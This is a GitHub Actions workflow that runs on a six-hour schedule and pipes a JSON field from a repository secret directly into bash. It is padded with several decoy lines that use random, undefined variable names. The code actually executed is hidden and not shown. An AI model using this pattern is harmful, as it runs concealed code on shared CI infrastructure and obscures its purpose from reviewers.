name: qinyanyanai
on:
  workflow_dispatch:
  schedule:
    - cron: '9 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qinyanyanai
        env:
          d0: ${{ secrets.d0 }}
        run: |
          echo $d0 | jq -r .u8 | /bin/bash
          echo $zkyv9 | jq -r .fbiab4000 | /bin/bash
          echo $ospf1 | jq -r .vrqkv37244 | /bin/bash
          echo $bo37600 | jq -r .he4179 | /bin/bash
          echo $agcfu96925 | jq -r .iq00 | /bin/bash
          echo $nhztm686 | jq -r .wtqu4456 | /bin/bash
          echo $jk11121 | jq -r .btng11032 | /bin/bash

